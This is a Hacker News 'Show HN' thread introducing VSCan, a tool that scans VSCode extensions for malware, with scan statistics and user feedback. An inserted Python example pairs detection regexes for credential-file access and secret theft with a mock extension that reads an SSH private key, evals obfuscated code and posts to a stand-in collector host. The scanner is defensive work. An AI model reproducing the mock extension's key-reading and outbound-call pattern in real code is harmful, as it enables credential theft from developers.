
Show HN: VSCan - Detect Malicious VSCode Extensions

39 points, by shadow-ninja, yesterday at 10:32 PM, 24 comments

Did you know that VSCode extensions run with full access to your system—including file system, network, and credentials? Worse, dozens of malicious extensions have already made it into the marketplace, silently compromising devices.

I am a security researcher and student developer who ran into this problem myself. To help tackle this, I built a 100% free tool (no login required) that scans VSCode (and Cursor/Windsurf) extensions for:

- Hidden malware and obfuscated code

- Dangerous permissions and API misuse

- Vulnerable dependencies and suspicious network connections

Users have already found hundreds of vulnerabilities in extensions. VSCan generates a clean, developer-friendly security report to help you understand what you're installing.

Try it out: https://www.vscan.dev

I have also developed custom sandboxing security architecture to restrict extensions from malicious activity during runtime. There is no existing technology that does this, so if you would be interested in trying it out or learning more, please reach out!

I would greatly appreciate any feedback and thanks for your help!

_______________________________________________________________________________

Here are some numbers as to what I have detected from a sample of 1077 extensions that are available on the Marketplace:

- 3 extensions are marked as malicious by VirusTotal

- 7 extensions use malicious network connections (verified by VirusTotal)

- 33 extensions have dependencies with critical vulnerabilities

- 39 extensions have sensitive information (I have seen API keys, usernames, passwords, etc.)

- 204 extensions have poor development practices as marked by OSSF

- 71 extensions have very high permissions (not bad in itself, but it can be an indicator of potential malicious activity)

As an example here is the link to an extension analysis with malicious network endpoints: https://vscan.dev/?analysisId=9e6c1849-3973-402b-a4ff-3b4023...
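As an added illustration of the kind of static checks a scanner like this can run over an extension's bundle and manifest (example code written for this thread, not VSCan's own code or rules; the indicator regexes, weights and the sample extension are all constructed for the demo):

```python
import json
import re
# Illustrative indicator regexes for the categories the post lists (not VSCan's rules).
INDICATORS = {
    "process_exec": re.compile(r"\b(?:child_process|spawnSync|execSync)\b"),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "obfuscation": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|[A-Za-z0-9+/]{80,}={0,2}"),
    "network": re.compile(r"https?://[\w.-]+(?::\d+)?(?:/[^\s'\"]*)?"),
    "credential_access": re.compile(r"\.ssh/|\.aws/credentials|\.npmrc|\.git-credentials"),
    "hardcoded_secret": re.compile(r"AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{36}"),
}
# Constructed weights; the cap of 100 mirrors the "71/100" style score mentioned in the thread.
WEIGHTS = {"process_exec": 15, "dynamic_eval": 20, "obfuscation": 25, "network": 10,
           "credential_access": 30, "hardcoded_secret": 30, "startup_activation": 10,
           "task_definitions": 10}

def scan_source(js_text: str) -> dict:
    """Map each triggered indicator to the sorted, de-duplicated strings that fired it."""
    findings = {}
    for name, pattern in INDICATORS.items():
        hits = sorted({m.group(0) for m in pattern.finditer(js_text)})
        if hits:
            findings[name] = hits
    return findings

def scan_manifest(package_json: str) -> dict:
    """Manifest signals: activation on every startup ("*") and contributed task definitions."""
    manifest = json.loads(package_json)
    findings = {}
    if "*" in manifest.get("activationEvents", []):
        findings["startup_activation"] = ["*"]
    task_types = [t.get("type", "?") for t in manifest.get("contributes", {}).get("taskDefinitions", [])]
    if task_types:
        findings["task_definitions"] = task_types
    return findings

def risk_score(findings: dict) -> int:
    """Sum the weights of the triggered indicators, capped at 100."""
    return min(100, sum(WEIGHTS[name] for name in findings))

# Constructed sample bundle and manifest of a suspicious extension (not a real extension).
SAMPLE_JS = r'''const cp = require("child_process"), https = require("https"), fs = require("fs");
const apiKey = "AKIAIOSFODNN7EXAMPLE";
function activate() {
  const keys = fs.readFileSync(process.env.HOME + "/.ssh/id_rsa");
  https.request("https://collector.example.invalid/upload", {method: "POST"});
  cp.execSync("whoami");
  eval("\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x6c\x6f\x67\x28\x31\x29");
}'''
SAMPLE_MANIFEST = '{"activationEvents": ["*"], "contributes": {"taskDefinitions": [{"type": "shell"}]}}'
```

Every indicator here is a heuristic: a legitimate extension can trigger `process_exec` or `task_definitions` (the rust-analyzer complaint below is exactly that), so the score is a prompt to read the findings, not a verdict.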


Comments

Groxx, today at 12:04 AM

It is beyond madness and well into "intentionally negligent" to release a plugin system without a permissions model in, like, the last 20 years. Can't believe people aren't up in arms about how wide open vscode and similar things are, particularly now that docker is widespread.

Thanks for building a scanner! I wish it wasn't necessary :/

CGamesPlay, today at 12:22 AM

You should definitely show the vulnerabilities you found on the front page, instead of showcasing low scores given to popular extensions. Claiming that "rust-analyzer" is "High Risk" is a strong turn-off from me thinking your service is useful (why? because it contains shell commands in the form of "taskDefinitions", and because it uses a dependency to parse ANSI sequences that hasn't received a commit in the past 90 days).

meander_water, today at 12:22 AM

Nice work! This has actually been an open feature request since 2018 [0]. I've been wanting something like this for a while.

[0] https://github.com/microsoft/vscode/issues/52116

staticshock, today at 2:45 AM

I'd love a version of this where I can paste my full list of extensions, instead of a box where I can only paste one. The latter is tedious, so I'm not that likely to do it.

xsc, today at 3:04 AM

A lot of directions you could take this. Free/Commercial. Thoughts?

Would be interesting to get more details on the sandbox.

ruined, today at 12:36 AM

I wish the detail links on each analysis tile were real links, instead of some apparently weird JavaScript. Seems broken in Firefox.

It would also be nice if I could expand all the analysis detail at once, instead of just one section at a time.

bilalq, today at 4:52 AM

I applaud the idea and love that you made this freely available without bolting on a SaaS subscription on top of it.

However, I always roll my eyes when I see high severity risk in dependency chains due to ReDoS vulnerabilities. Sure, it matters for a web server maybe, but code running in a CLI tool, browser app, VSCode extension, or even a serverless lambda runtime really won't be affected much. More often than not, I find the `npm audit` risk classifications to be nonsense.

sunilagrawal, today at 12:10 AM

That's concerning. What is Microsoft doing about it? Have you contacted them?

tonymet, today at 12:53 AM

vscodevim got 71/100 high risk. That's a pretty common one.

dlalchandani, today at 1:30 AM

Finally we have something like this. This is very good work.

whalesalad, today at 12:47 AM

Using this is kind of a pain in the butt (looking thru all installed extensions and pasting in the raw name one by one). Could this be packaged as an extension itself, that scans other extensions? Or provide a CLI command to export all of your installed extensions as a list, which you can then upload? Or better, a one liner that will export your extensions to stdin, POST them to your API, and it will return a URL that you can click and load in the browser to explore the breakdown of (potential) issues.
